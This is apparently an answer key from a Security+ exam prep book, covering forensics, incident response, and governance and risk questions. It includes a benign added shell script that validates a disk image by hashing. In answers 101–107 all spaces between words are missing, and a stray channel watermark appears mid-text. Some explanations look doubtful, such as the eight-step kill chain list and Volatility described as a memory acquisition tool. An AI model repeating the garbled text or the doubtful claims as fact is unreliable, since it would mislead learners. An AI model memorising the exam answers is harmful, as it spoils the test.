55. B. The most important action Charles can take while working with his forensic artifacts to provide nonrepudiation is to digitally sign the artifacts and information that he is creating in his evidence records. Encrypting the output will ensure its confidentiality but will not provide nonrepudiation by itself. MD5 checksums for images are commonly gathered but must then be signed so that they can be validated to ensure they have not been modified.

56. D. The memdump tool is a command-line memory dump utility that can dump physical memory. Somewhat confusingly, memdump is also a flag in the very useful Volatility framework, where it can be used to dump memory as well. The remaining options were made up and are not Linux tools, although you can create a ramdump on Android devices.

57. B. The Windows swap file is pagefile.sys and is saved in the root of the C:\ drive by default.

58. A. The best way to capture a virtual machine from a running hypervisor is usually to use the built-in tools to obtain a snapshot of the system. Imaging tools are not typically capable of capturing machine state, and dd is not designed to capture VMs. Removing a server's drives can be challenging due to RAID and other specific server configuration items, and doing so might impact all other running VMs and services on the system.

59. C. A well-documented chain of custody can help establish provenance for data, proving where it came from, who handled it, and how it was obtained. Right to audit, timelines, and preservation of images do not establish provenance, although preservation is part of the chain of custody process.

60. B. Digital forensics techniques are commonly used to analyze attack patterns, tools, and techniques used by advanced persistent threat (APT) actors for counterintelligence purposes. They may sometimes be used to determine what information was stolen, but this is not the most common use for digital forensic techniques, nor is their use as a training mechanism.

61. A. Law enforcement is not typically part of organizational incident response teams, but incident response teams often maintain a relationship with local law enforcement officers. Security analysts, management, and communication staff as well as technical experts are all commonly part of a core incident response team.

62. A. Even if you're not familiar with iptables, you can read through these rules and guess which rule includes the right details. DROP makes sense for a block, and you should know that SSH will be a TCP service on port 22.

63. C. logger is a Linux utility that will add information to the Linux syslog. It can accept file input, write to the system journal entry, send to remote syslog servers, and perform a variety of other functions. The other commands do not directly interface with the system log.

64. A. Incident response plans don't stop incidents from occurring, but they do help responders react appropriately, prepare the organization for incidents, and may be required for legal or compliance reasons.

65. D. Degaussing a drive uses strong magnetic fields to wipe it and is the least likely to result in recoverable data. Deleted files can often be recovered because only the file index information will be removed until that space is needed and is overwritten. Quick formats work in a similar way and will leave remnant data, and files that are overwritten by smaller files will also leave fragments of data that can be recovered and analyzed.

66. D. Henry's most likely use for the video is to document the forensic process, part of the chain of custody and provenance of the forensic data he acquires. The order of volatility helps determine what devices or drives he would image first. There is no crime being committed, so establishing guilt is not relevant to this scenario, and the video will not ensure data is preserved on a drive during a forensic process.

67. B. WinHex is the only disk editor in this list. Autopsy is a forensic analysis suite; dd and FTK Imager are both imaging tools. WinHex also provides the ability to read RAID and dynamic disks, perform data recovery, edit physical memory, clone disks, wipe files and drives, and a variety of other functions.

68. B. Playbooks list the required steps that are needed to address an incident. A runbook focuses on the steps to perform an action or process as part of an incident response process. Thus, a playbook may reference runbooks. Business continuity (BC) plans and disaster recovery (DR) plans are not used for incident response, but they are used to ensure that a business stays online or can recover from a disaster.

69. C. Passwords are typically stored using a hash, and best practices would have them stored using a password security–specific hash. Alaina can speed up her efforts if she knows what hashing algorithm and options were used on the passwords. The age and length of the passwords are not necessary, and passwords should not be stored in encrypted form—but the question also specifically notes they're hashed passwords.

70. D. An application blocklist would fit Vincent's needs the best from the list provided. An approved list would prevent other tools from being installed, which may impede functionality while making the maintenance of the list challenging. A data loss prevention (DLP) solution attempts to prevent data from being sent or exposed but does not prevent installations or downloads of games. A content filter might help, but workarounds are easy, including sending games via email or via a thumb drive.

71. B. IPSec is not a tool used to capture network flows. sFlow, NetFlow, and IPFIX are all used to capture network flow information, which will provide the information Charlene needs.

72. C. A system crash, or system dump, file contains the contents of memory at the time of the crash. The infamous Windows blue screen of death results in a memory dump to a file, allowing analysis of memory contents. The swap file (pagefile) is used to store information that would not fit in memory but is unlikely to contain a currently running malware package, since files are swapped out when they are not in use. The Windows security log does not contain this type of information, nor does the system log.

73. C. The Windows tracert command will show the route to a remote system as well as delays along the route. traceroute is the equivalent command in Linux. The arp command allows you to view and modify the Address Resolution Protocol (ARP) cache in Windows, and netstat has varying functions in different operating systems but generally shows statistics and information about network usage and status.

74. B. PRTG and Cacti are both network monitoring tools that can provide bandwidth monitoring information. Bandwidth monitors can help identify exfiltration, heavy and abnormal bandwidth usage, and other information that can be helpful for both incident identification and incident investigations. If you encounter a question like this on the exam, even if you're not familiar with either tool, you can use your knowledge of what Simple Network Management Protocol (SNMP) is used for to identify which of the categories is most likely correct.

75. D. The Security+ exam outline focuses on right to audit clauses, regulatory and jurisdictional issues, and data breach notification laws as key elements to consider when planning on-site versus cloud forensic differences. Provenance is important regardless of where the forensic activity occurs.

76. A. A variety of configuration changes could be pushed to mobile devices to help: setting passcodes, enabling full-disk encryption (FDE) on mobile devices via organizationally deployed mobile device management (MDM), or even preventing some sensitive files from being downloaded or kept on those devices could all help. Firewall rules, data loss prevention (DLP) rules, and URL filters will not prevent a stolen device from being accessed and the data being exposed.

77. B. The @ command for dig selects the Domain Name System (DNS) server it should query. In this case, it will query one of Google's DNS servers at 8.8.8.8 for the DNS information for example.com.

78. C. Greg should use the built-in hashing functions to compare either an MD5 or SHA-1 hash of the source drive to a hash using the same function run on the image. If they match, he has a valid and intact image. None of the other answers will provide validation that the full drive was properly imaged.
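As an added example (not from the book) of the image validation described in answers 25 and 78, this shell script acquires a constructed sample "drive" with dd, compares digests of the source and the image, and then shows that a single corrupted byte in the image makes the check fail. It assumes GNU coreutils (sha256sum, dd, mktemp) and uses SHA-256 where the answers mention MD5 and SHA-1; on a real acquisition the source would be a device such as /dev/sda rather than a file. The function names and the sample data are my own.

```shell
#!/bin/sh
# Added example: validating a forensic image against its source by hashing
# both and comparing, as answers 25 and 78 describe. Not code from the book.
# Uses a constructed file as the "source drive" and sha256sum (assumed GNU
# coreutils) in place of the MD5/SHA-1 tools the answers mention.

# Print the hex digest of a file or block device.
digest_of() {
    sha256sum "$1" | awk '{ print $1 }'
}

# Compare source and image digests; print MATCH or MISMATCH and return 0 or 1.
# Both digests are written to stderr so they can be pasted into the evidence log.
verify_image() {
    src=$(digest_of "$1")
    img=$(digest_of "$2")
    printf 'source %s  %s\nimage  %s  %s\n' "$src" "$1" "$img" "$2" >&2
    if [ "$src" = "$img" ]; then
        echo MATCH
        return 0
    fi
    echo MISMATCH
    return 1
}

# Walk through a good acquisition and a corrupted one using constructed data.
# Prints the two verification results on one line, e.g. "MATCH MISMATCH".
demo_verification() {
    work=$(mktemp -d)

    # Constructed 64 KiB "drive": 1024 lines of exactly 64 bytes each.
    i=0
    while [ "$i" -lt 1024 ]; do
        printf 'SAMPLE-DRIVE-BLOCK-%04d-%s\n' "$i" "0123456789abcdef0123456789abcdef0123456"
        i=$((i + 1))
    done > "$work/source.img"

    # Acquire the image with dd, the same tool used to image a real drive.
    dd if="$work/source.img" of="$work/image.img" bs=4096 2>/dev/null
    first=$(verify_image "$work/source.img" "$work/image.img" 2>/dev/null) || first=MISMATCH

    # Overwrite one byte of the image to simulate a bad acquisition; the
    # digests must now differ even though the file size is unchanged.
    printf 'Z' | dd of="$work/image.img" bs=1 seek=100 conv=notrunc 2>/dev/null
    second=$(verify_image "$work/source.img" "$work/image.img" 2>/dev/null) || second=MISMATCH

    rm -rf "$work"
    echo "$first $second"
}

demo_verification
```

Record both digests alongside the drive's serial number in the chain-of-custody documentation, and sign that record if nonrepudiation is required (answer 55); a bare hash only proves the image matched at the moment it was computed.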

79. B. The Linux grep command is a search tool that Adam can use to search through files or directories to find strings. cat is short for concatenate, and the command can be used to create files, to view their contents, or to combine files. head and tail are used to view the beginning or end of a file, respectively.

80. C. Segmentation splits networks or systems into smaller units that align with specific needs. Segmentation can be functional, security based, or for other purposes. Removing potentially infected systems would be an example of isolation, using firewalls and other tools to stop the spread of an infection is containment, and adding security systems to prevent data loss is an example of implementing a security tool or feature.

81. B. Unlike a disaster recovery plan that is written to help an organization recover from a person-made or natural disaster, a business continuity plan focuses on how to keep the business running when it is disrupted. Thus, Charlene's BC plan would detail how to keep the organization running when a system outage occurs.

82. C. OpenSSL can be used to generate a certificate using a command like this:

openssl req -x509 -sha256 -nodes -days 365 -newkey rsa:2048 -keyout privateKey.key -out certificate.crt

None of the other tools listed can be used to generate a certificate.

83. A. The only password cracker listed is John the Ripper. John accepts custom wordlists, meaning that Cameron can create and use his own wordlist, as shown in option A.

84. A. Autopsy does not have a built-in capability to create disk images. Instead, it relies on third-party tools for acquisition and then imports disk images and other media. Autopsy has built-in timeline generation, image filtering and identification, and communication visualization, among many other capabilities.

85. C. Many cloud service providers do not allow customer-driven audits, either by the customer or a third party. They also commonly prohibit vulnerability scans of their production environment to avoid service outages. Instead, many provide third-party audit results in the form of a service organization controls (SOC) report or similar audit artifact.

86. B. The Cyber Kill Chain moves to privilege escalation after exploitation. The entire kill chain is: 1) Reconnaissance, 2) Intrusion, 3) Exploitation, 4) Privilege Escalation, 5) Lateral Movement, 6) Obfuscation/Anti-forensics, 7) Denial of Service, and 8) Exfiltration.

87. D. Of the tools that are listed, only Metasploit is an exploitation framework. Cuckoo is a malware testing sandbox, theHarvester is an open source intelligence gathering tool, and Nessus is a vulnerability scanner. Tools like Metasploit, BeEF, and Pacu are all examples of exploitation frameworks.

88. A. A playbook for a security orchestration, automation, and response (SOAR) environment is a set of rules that determine what actions will be performed when an event occurs that is identified by the SOAR using data it collects or receives.

89. B. The Security+ exam outline uses a six-step process for incident response: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned.

90. D. A disaster recovery plan addresses what to do during a person-made or natural disaster. A flood that completely fills a datacenter would require significant efforts to recover from, and Gurvinder will need a solid disaster recovery plan—and perhaps a new datacenter location as soon as possible! A COOP, or Continuity of Operations Plan, is needed for U.S. government agencies but is not required for businesses. A business continuity plan would cover how to keep business running, but it does not cover all the requirements in a natural disaster of this scale, and a flood insurance plan is not a term used in the Security+ exam.

91. C. pathping combines both ping and tracert/traceroute style functionality to help identify both the path used and where latency is an issue. It is built into Windows and can be used for exactly the troubleshooting that Frank needs to accomplish. He could use both ping and tracert/traceroute to perform the task, but he would need to spend more time using each tool in turn to identify the same information that pathping will put into a single interface. netcat, while useful for many tasks, isn't as well suited to this one.

92. A. The dnsenum tool can perform many Domain Name System (DNS)-related functions, including querying A records, name servers, and MX records, as well as performing zone transfers, Google searches for hosts and subdomains, and netrange reverse lookups. dig and host are useful for DNS queries but do not provide this range of capabilities, and dnscat was made up for this question.

93. C. Jill wants the least possible changes to occur on the system, so she should instruct the user to not save any files or make any changes. Rebooting the system will not create a memory dump, and may cause new files to be written or changed if patches were waiting to install or other changes are set to occur during a reboot. Turning off secure delete or making other changes will not impact the files that were deleted prior to that setting change.

94. C. Anti-forensics activities follow lateral movement in the Cyber Kill Chain model. It helps to remember that after an attacker has completed their attack, they will attempt to hide traces of their efforts, and then may proceed to denial-of-service or exfiltration activities in the model.

95. B. The IR process used for the Security+ exam outline is Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned. Veronica should move into the lessons learned phase.

96. C. Quick formatting merely deletes file indexes rather than removing and overwriting files, making it inappropriate for sanitization. Physical destruction will ensure that the data is not readable, as will degaussing and zero wiping.

97. D. Microsoft Office places information like the name of the creator of the file, editors, creation and change dates, and other useful information in the file metadata that is stored in each Office document. Bart can simply open the Office document to review this information or can use a forensic or file metadata tool to review it. File names may contain the creator's name, but this would only be if the creator included it. Microsoft Office does not create or maintain a log, and the application log for Windows does not contain this information.

98. B. Windows Defender Firewall operates on a per-application model and can filter traffic based on whether the system is on a trusted private network or a public network. Nathaniel should allow Chrome by name in the firewall, which will allow it to send traffic without needing to specify ports or protocols.

99. B. The dnsenum Perl script builds in quite a few Domain Name System (DNS) enumeration capabilities, including host, name server, and MX record gathering; zone transfer; Google scraping for domains; subdomain brute forcing from files; as well as Whois automation and reverse lookups for networks up to class C in size. Although you could manually use dig or nslookup or even netcat to perform many of these functions, dnsenum is the only automated tool on the list.

100. B. Building a timeline, particularly from multiple systems, relies on accurately set system clocks or adding a manually configured offset. Disk hashing and acquisition does not need an accurate system clock, and file metadata can be reviewed even without an accurate clock, although accurate clock information or knowing the offset can be useful for analysis.

101. B. Databreachnotificationlawsoftenbuildinamaximumlengthoftimethatcanpassbeforenotificationisrequired.Theyalsooftenincludeathresholdfornotification,withamaximumnumberofexposedindividualsbeforethestateorotherauthoritiesmustbenotified.Theydonotincludeamaximumnumberofindividualswhocanbenotified,nordotheytypicallyhavespecificrequirementsaboutpoliceinvolvementinforensicinvestigationsorcertificationtypesorlevels.

102. C. Adatalossprevention(DLP)toolthatcanscanandreviewemailsforSSNstyledataisthemosteffectivetoollistedhere.NaomimaywanttosetthetooltoblockallemailswithpotentialSSNs,andthenreviewthoseemailsmanuallytoensurethatnofurtheremailsleavewhileallowinglegitimateemailstopassthrough.Anintrusiondetectionsystem(IDS)mightlooktemptingasananswer,butanIDScanonlydetect,notstop,thetraffic,whichwouldallowtheSSNstoexittheorganization.Antimalwareandfirewallswillnotstopthistypeofevent.

103. C. Emailheaderscontainasignificantamountofmetadata,includingwheretheemailwassentfrom.Thefrom:fieldlistsasenderbutdoesnotindicatewheretheemailwasactuallysentfrom.Theto:fieldlistswhotheemailwassentto,andfootersarenotusedtostorethisinformationforemail.

104. A. Jurisdictionalboundariesexistbetweenstatesandlocalities,aswellascountries,makingitchallengingforlocallawenforcementtoexecutewarrantsandacquiredatafromorganizationsoutsideoftheirjurisdictioninmanycases.Venueisusedtodescribewherealegalcaseisconducted.Legislationmayormaynothaveanimpact,andbreachlawsareunlikelytoimpactthisbutwouldguideHenryaboutwhennotificationsofabreachwouldneedtooccur.

Telegram Channel @nettrain

105. A. OliviashoulduseJohntheRipper.AlthoughbothJohntheRipperandrainbowtabletoolslikeOphcrackcanbeusedtocrackpasswords,JohntheRipperwillprovideabetterviewofhowhardthepasswordwastocrack,whereasrainbowtabletoolswillsimplydetermineifthepasswordhashcanbecracked.Crack.itandTheHunterweremadeupforthisquestion.

106. B. TheFederalEmergencyManagementAgency(FEMA),partoftheDepartmentofHomelandSecurity,isinchargeofContinuityofOperationsPlanning(COOP),whichisarequirementforfederalagencies.TheU.S.DepartmentofAgriculture(USDA),theNationalSecurityAgency(NSA),andtheFederalBureauofInvestigations(FBI)arenotinchargeofContinuityofOperationsPlanning.

107. B. WindowsconfigurationdatacanbequeriedusingPowerShell,allowingElainetowritescriptsthatwillgathersecurityconfigurationdata.BashisashellusedforLinuxsystems.AlthoughWindowssystemscannowrunBashintheLinuxsubsystem,itisn’tinstalledbydefault.SecureShell(SSH)isusedforremoteshellaccess,andPythoncouldbeusedbutwouldneedtobeinstalledspecificallyforthispurposeandisn’tavailablebydefault.

108. C. The best option listed is a Wireshark capture of traffic from the phone. In some cases, this traffic may be encrypted, and Ramon may need to take additional steps to decrypt the data. Call manager logs and Session Initiation Protocol (SIP) logs do not include the full audio of a conversation.

109. C. NXLog is a log collection and centralization tool. IPFIX, NetFlow, and sFlow all gather data about network traffic, including source, destination, port, protocol, and amount of data sent, to be collected.

110. A. Pete has isolated the system by placing it on a separate logical network segment without access. Some malware can detect if systems lose their network connection, and Pete may want to perform forensics via the network or monitor attempts to send outbound traffic, meaning that simply unplugging the system may not meet his needs. Containment would involve limiting the spread or impact of an attack, segmentation places systems in groups based on rules or security groupings, and eradication is a part of the incident response (IR) process where components of an incident or attack are removed.

111. C. Virtual machine forensics typically rely on a snapshot gathered using the underlying virtualization environment's snapshot capabilities. This will capture both memory state and the disk for the system and can be run on an independent system or analyzed using forensic tools.

112. B. The tcpreplay tool is specifically designed to allow PCAP capture files to be replayed to a network, allowing exactly this type of testing. hping can be used to craft packets, but it's not designed to replay capture files. tcpdump is used to capture packets, but again, it is not a replay tool, and Cuckoo is a sandboxing tool for testing and identifying malware packages.

113. C. Windows creates a dump file, which contains all the contents of active memory to allow analysis of the crash.

114. D. Segmenting a network based on security or risk levels helps ensure that attacks and compromises are constrained to the same types of systems or devices with similar levels of security requirements. Isolation would remove a device or system from contact with the network or other systems. Fragmentation and tiering are not terms used for the Security+ exam.

115. A. Tagging each drive helps with inventory and ensures that the drive is tracked properly and that the chain of custody can be maintained. Taking a picture may be useful to identify the drive, but tagging and inventory control are more important. Drives are not labeled with an order of volatility because the order of volatility is associated with the type of forensic target, not with a specific drive. Interviews may be useful but are not always conducted with every person whose machine is imaged.

116. B. The provenance of a forensic artifact includes the chain of custody, including ownership and acquisition of the artifact, device, or image. E-discovery is the process of doing discovery in electronic formats for litigation, investigations, and records requests. Jurisdiction is the region or area where laws or law enforcement has authority. Volatility is how likely a device or component is to change.

117. B. The Volatility framework is a purpose-built tool for the acquisition of random access memory (RAM) from a live system. Autopsy is a forensic tool for drive analysis and forensic investigations, dd is used to image drives, and netcat is a tool used to transfer data or to make connections to systems across a network.

118. D. Wireshark is a network protocol analyzer and capture tool that can be used for troubleshooting in circumstances like this. In fact, security practitioners are often asked to verify that traffic is being received properly as part of firewall rule troubleshooting. Randy may want to capture traffic at both ends of the communication to make sure that the clients are sending traffic properly and then to match that to the same traffic being received, or going missing, at the other end. tracert and traceroute are useful for validating the route that traffic takes but would not show if HTTPS packets were being blocked, and Sn1per is a pentest framework that allows automated pentesting.

119. B. The oldest and least capable tool listed is syslog, the original system logging tool for Linux and Unix systems. The other three options have advanced features, which mean that they are more broadly implemented when flexibility and reliability are needed.

120. A. The only tool on this list that can be used to craft packets is hping. Susan could use the sample code or exploit by building the necessary packet with hping and then sending it to a Dynamic Host Configuration Protocol (DHCP) server in her network while monitoring with her intrusion prevention system (IPS). She may want to capture all of her traffic with Wireshark or tcpdump to observe what happens on both ends too!

121. D. SQL injection attempts are sent as HTTP or HTTPS requests to a web server, meaning that Valerie will be able to see the attacks in the web server log. Domain Name System (DNS) logs, if available, will not show these. Auth logs show logins, not web or SQL Server queries or requests. Unlike Windows, there is no security log file for Linux, although there is a secure log for some systems.

122. A. If the private key and the passphrase for a certificate are exposed, the certificate should be revoked. A new certificate will need to be issued, but the certificate cannot be trusted and revocation is the first step to handle the issue properly. Changing the password will not help, and changing the private or public key will require a new certificate.

123. C. A legal hold notice will inform the company that they must preserve and protect information related to the case. None of the other items are terms used in this process.

124. B. netstat can show all active connections, and using the -a flag will do so. netstat does not provide a -c command flag. The route command is used to modify and display the system's routing table. hping is a packet analyzer and packet building tool often used to craft specific packets as part of penetration tests and attacks.

125. B. A quarantine setting will place a malicious or suspect file in a safe location and will keep it there until a set time frame has passed or until an administrator takes action to deal with it. This can allow you to further analyze the file or to restore it if it was an incorrect identification or if the file is needed for another purpose. Containment is used to limit the extent of an incident or attack, isolation keeps a system or device from connecting to or accessing others, and deleting a file wouldn't keep it around.

126. D. Although Linux systems can use a file for swap space, a common solution is to use a separate partition for swap space.

127. A. Tracking multiple drives requires careful inventory, evidence handling logging, and tagging of the drives to ensure that they are the right drive and that they are tracked throughout the forensic investigation. Marco should carefully tag each of the drives and ensure that those tags are used throughout the investigation.

128. D. The -v flag for netcat sets it to verbose mode. That means that Isaac has attempted to connect to every port from 1 to 1024 on 10.11.10.1 using netcat. Since there are no other flags or options, it will simply try to connect, and then provide a verbose result about what happened, resulting in a simple but effective port scan.

129. B. Tony's best option is likely containment. He may want to remove that location from the corporate network or to prevent most traffic from being permitted until he can take a deeper look into what is going on. If he isolated the entire site, he might disrupt critical business operations, and segmentation would have been more appropriate before the event occurred.

130. C. Right-to-audit clauses are commonly accepted as part of service and leasing contracts regardless of location for datacenter co-location and facility rental contracts. Cloud service providers, however, are less likely to sign a right-to-audit contract. Instead, they may provide third-party audit data to customers or even to potential customers.

131. D. The best option for Alaina would be to use a URL filter to block users from visiting the link in the phishing email. A WAF, or web application firewall, is designed to prevent attacks against a web application. Patching can help stop exploits of vulnerable services or systems, but this is a phishing attack, and an allow list lists allowed items, not blocked items, and limiting which websites an entire company can visit is almost impossible in most circumstances.

132. A. Playbooks list the actions that an organization will take as part of a response process. A runbook lists the steps required to perform an action like notification, removing malware, or similar tasks. Playbooks tend to be used to document processes, whereas runbooks tend to be used for specific actions. A disaster recovery (DR) plan is used to recover from disasters, and a business continuity (BC) plan is used to ensure that the organization continues to function.

133. B. Since MAC addresses are only visible within a broadcast domain (local network), the MAC addresses of external hosts cannot be retrieved using the arp command. The MAC addresses for local systems, the IP addresses of the local hosts, and whether they are dynamic or static can all be determined using the arp command.

134. C. The journalctl tool is used to query the systemd journal. On systemd-enabled Linux distributions, the journal contains kernel and boot messages as well as syslog messages and messages from services.

135. C. The recovery phase often involves adding firewall rules and patching systems in addition to rebuilding systems. Although preparation may involve configuring firewall rules or regular patching, it does not do so in response to an incident. Containment might involve both but is less likely to, since the focus will be on broader fixes, and eradication works to remove the threat.

136. A. The curl command-line tool supports downloads and uploads from a wide variety of services, and it would be the ideal solution for this scenario. hping is used for crafting packets, nmap is a port scanner, and theHarvester is an open source intelligence gathering tool, none of which meet Gary's needs.

137. C. Gary should look at the trend information for malware detections to check to see if there are more infections being detected than during recent weeks. This can be a useful indicator of a change, either due to a new malware technique or package, a successful attack that has resulted in staff members clicking on malicious links or opening malicious emails, or other paths into the organization. Gary could then check with users whose systems reported the malware to see what had occurred. Alerts might show the infections but would not show the data over time as easily as trends. Sensors will show individual places data is gathered, and bandwidth dashboards can show useful information about which systems are using more or less bandwidth, but the trends dashboard remains the right place for him to look in this situation.

138. B. Although it can be easy to focus on the digital part of digital forensics, interviews with end users and others involved in an incident can be a key element of a forensic investigation. Investigators still need to gather information and record what they found, but an interview can provide firsthand knowledge and additional details that may not be able to be recovered via technical means like email or disk forensics. A chain of custody does not provide information about reports from end users.

139. B. The only option on this list that supports Aaron's requirements is NXLog. Syslog can receive Windows events if they are converted to syslog, but it isn't a native feature. IPFIX is a network flow standard, and journalctl is used to access the systemd journal.

140. A. Typical exercise types for most organizations include simulations that emulate an actual incident response process, walk-throughs that guide staff through an event, and tabletop exercises that are gamed out without taking actual action. Drills are classified as more focused on specific actions or functions, and they are less common because they can result in inadvertent action or mistakes and do not cover the breadth of an incident.

141. A. Of the options listed, netstat is the only tool that will not perform a port scan.

142. C. The top of the diamond should be labeled Adversary, one of the four vertices on the Diamond model.

143. C. Electronic discovery, or e-discovery, is the legal proceeding involved in litigation, FOIA requests, and similar efforts that produce information in electronic form. Email forensics could be required to recover data in an investigation, but there is no indication in the question of any need for forensic investigation. Inquisitions and provenance are not concepts for the Security+ exam.

Chapter 5: Governance, Risk, and Compliance

1. A. Caroline should select ISO 27002. ISO 27002 is an international standard for implementing and maintaining information security systems. ISO 27017 is an international standard for cloud security; NIST 800-12 is a general security standard and it is a U.S. standard, not an international one; and NIST 800-14 is a standard for policy development, and it is also a U.S. standard, not an international one.

2. B. If a system is infected with malware, the malware will operate with the privileges of the current user. If you use nonadministrative accounts, with least privileges, then the malware won't be able to access administrative functionality without a privilege escalation capability.

3. D. Least privilege is the most fundamental concept in establishing accounts. Each user should have just enough privileges to do their job. This concept also applies to service accounts. Although each of the other options is something you would consider, they are not as critical as the principle of least privilege.

4. C. Change management is the process of documenting all changes made to a company's network and computers. Avoiding making changes at the same time makes tracking any problems that can occur much simpler. Due diligence is the process of investigation and verification of the accuracy of a particular act. Acceptable use policies state what actions and practices are allowed in an organization while using technology. Due care is the effort made by a reasonable party to avoid harm to another. It is the level of judgment, care, determination, and activity a person would reasonably be expected to exercise under certain conditions.

5. A. An acceptable use policy (AUP) is a document stating what a user may or may not have access to on a company's network or the Internet. A clean desk policy ensures that all sensitive/confidential documents are removed from an end-user workstation and locked up when the documents are not in use. A mandatory vacation policy is used by companies to detect fraud by having a second person, familiar with the duties, help discover any illicit activities. Job rotation is a policy that describes the practice of moving employees between different tasks. Job rotation can help detect fraud because employees cannot perform the same actions for long periods of time.

6. C. The PCI-DSS, or Payment Card Industry Data Security Standard, is a security standard that is mandated by credit card vendors. The Payment Card Industry Security Standards Council is responsible for updates and changes to the standard. GDPR, or the General Data Protection Regulation, is a standard for data privacy and security in the European Union (EU). COPPA is the Children's Online Privacy Protection Act, a U.S. federal law. CIS is the Center for Internet Security and is not a law or a regulation.

7. A. Companies will use mandatory vacation policies to detect fraud by having a second person, familiar with the duties, help discover any illicit activities. A clean desk policy ensures that all sensitive/confidential documents are removed from an end-user workstation and locked up when the documents are not in use. A nondisclosure agreement (NDA) protects sensitive and intellectual data from getting into the wrong hands. Continuing education is the process of training adult learners in a broad list of postsecondary learning activities and programs. Companies will use continuing education in training their employees on new threats and also in reiterating current policies and their importance.

8. B. Locking cabinets and drawers is the best solution because they allow individuals to lock their drawers and ensure that access to a single key does not allow broad access to documents, unlike a department door lock or proximity cards for the space. Onboarding is the process of adding an employee to a company's identity and access management system and would not help with securing documents, but it might teach the process of doing so.

9. D. Quantitative risk assessment is the process of assigning numerical values to the probability an event will occur and what impact the event will have. Change management is the process of managing configuration changes made to a network. Vulnerability assessment attempts to identify, quantify, and rank the weaknesses in a system. Qualitative risk assessment is the process of ranking which risk poses the most danger using ratings like low, medium, and high.

10. D. A memorandum of understanding (MOU) is a type of agreement that is usually not legally binding. This agreement is intended to be mutually beneficial without involving courts or money. An SLA (service level agreement) defines the level of service the customer expects from the service provider. The level of service definitions should be specific and measurable in each area. A BPA (business partnership agreement) is a legal agreement between partners. It establishes the terms, conditions, and expectations of the relationship between the partners. An ISA (interconnection security agreement) is an agreement that specifies the technical and security requirements of the interconnection between organizations.

11. A. Escalation is necessary in cases where the current breach goes beyond the scope of the organization or investigators or is required by law. In this case, Sally believes a crime has been committed and has escalated the case to law enforcement. Other escalations might be to federal or state law enforcement, or to other more capable internal or external investigators. Tokenizing data uses a deidentified replacement data item, public notification notifies the population or customers at large, and outsourcing investigations may be done if specialized skills are needed.

12. A. The single loss expectancy (SLE) is the product of the value ($16,000) and the exposure factor (.35), or $5,600.

13. C. Antivirus is an example of a corrective control. A corrective control is designed to correct a situation. An IDS (intrusion detection system) is a detective control because it detects security breaches. An audit log is a detective control because it detects security breaches. A router is a preventive control because it prevents security breaches with access control lists (ACLs).

14. A. A deterrent control is used to warn a potential attacker not to attack. Lighting added to the perimeter and warning signs such as a "no trespassing" sign are deterrent controls. The other options are examples of detective controls. A detective control is designed to uncover a violation; although some detective controls may serve as a deterrent, for example, when a camera is visible, they are not primarily deterrent controls.

15. D. Testing and training are preventive administrative controls. Administrative controls dictate how security policies should be executed to accomplish the company's security goals. A detective technical control uncovers a violation through technology. A preventive technical control attempts to stop a violation through technology. Detective administrative controls uncover a violation through policies, procedures, and guidelines.

16. A. Risk acceptance is a strategy of recognizing, identifying, and accepting a risk that is sufficiently unlikely or that has such limited impact that a corrective control is not warranted. Risk transfer is the act of moving the risk to hosted providers who assume the responsibility for recovery and restoration, or of acquiring insurance to cover the costs emerging from a risk. Risk avoidance is the removal of the vulnerability that can increase a particular risk so that it is avoided altogether. Risk mitigation is when a company implements controls to reduce vulnerabilities or weaknesses in a system. It can also reduce the impact of a threat.

17. D. In most cases, operating a facility in a state is sufficient reason to need to comply with state laws. Jim should check with a lawyer, but he should plan on needing to comply with Illinois, Indiana, and Ohio law, as well as federal laws.

18. A. Onboarding is the process of adding an employee to a company's identity and access management system. Offboarding is the process of removing an employee from the company's identity and access management system. Adverse action is an official personnel action that is taken for disciplinary reasons. Job rotation gives individuals the ability to see various parts of the organization and how it operates. It also eliminates the need for a company to rely on one individual for security expertise should the employee become disgruntled and decide to harm the company. Recovering from a disgruntled employee's attack is easier when multiple employees understand the company's security posture.

19. A. A clean desk policy ensures that sensitive information and documents are not left on desks after hours and requires employees to place those files into a less exposed or secure location. Background checks, continuing education, and job rotation do not protect confidential information left on desks from being exposed.

20. A. As users register for an account, they enter letters and numbers they are given on the web page before they can register. This is an example of a deterrent control since it prevents bots from registering and proves this is a real person. Detective controls detect intrusion as it happens and uncover a violation. A compensating control is used to satisfy a requirement for a security measure that is too difficult or impractical to implement at the current time. Degaussing is a method of removing data from magnetic storage media by changing the magnetic field.

21. D. A parking policy generally outlines parking provisions for employees and visitors. This includes the criteria and procedures for allocating parking spaces for employees and is not a part of organizational security policy. Instead, it is an operational or business policy. An acceptable use policy describes the limits and guidelines for users to make use of an organization's physical and intellectual resources. This includes allowing or limiting the use of personal email during work hours. A social media policy defines how employees should use social media networks and applications such as Facebook, Twitter, LinkedIn, and others, since misuse can adversely affect a company's reputation. Password policies define the complexity of creating passwords. They should also define weak passwords and how users should protect password safety.

22. C. Proprietary data is a form of confidential information, and if the information is revealed, it can have severe effects on the company's competitive edge. High is a generic label assigned to data internally that represents the amount of risk of being exposed outside the company. The top-secret label is often used in governmental systems where data and access may be granted or denied based on assigned categories. Low is a generic label assigned to data internally that represents the amount of risk of being exposed outside the company.

23. C. Antivirus software is used to protect computer systems from malware and is not a physical security control. Physical controls are security measures put in place to reduce the risk of harm coming to a physical property. This includes protection of personnel, hardware, software, networks, and data from physical actions and events that could cause damage or loss.

24. A. Quantitative risk assessment is the process of assigning numerical values to the probability an event will occur and what impact the event will have. Qualitative risk assessment is the process of ranking which risk poses the most danger using ratings such as low, medium, and high. A business impact analysis (BIA) is used to evaluate the possible effect a business can suffer should an interruption to critical system operations occur. This interruption could be the result of an accident, emergency, or disaster. Threat assessment is the process of identifying and categorizing different threats such as environmental and person-made. It also attempts to identify the potential impact from the threats.

25. D. A nondisclosure agreement (NDA) protects sensitive and intellectual data from getting into the wrong hands. An NDA is a legal contract between the company and a third-party vendor to not disclose information per the agreement. Encrypted data that is sent can still be decrypted by the third-party vendor if they have the appropriate certificate or the key, so encryption does not restrict their access to the data. Violating an NDA would constitute unauthorized data sharing, and a violation of privileged user role-based awareness training has nothing to do with sharing proprietary information.

26. A. Detective controls like CCTV detect intrusion as it happens and can help uncover violations. Policies are administrative controls. Firewalls and intrusion prevention system (IPS) devices are technical controls. Technical controls are applied through technology and may also be deterrent, preventive, detective, or compensating.

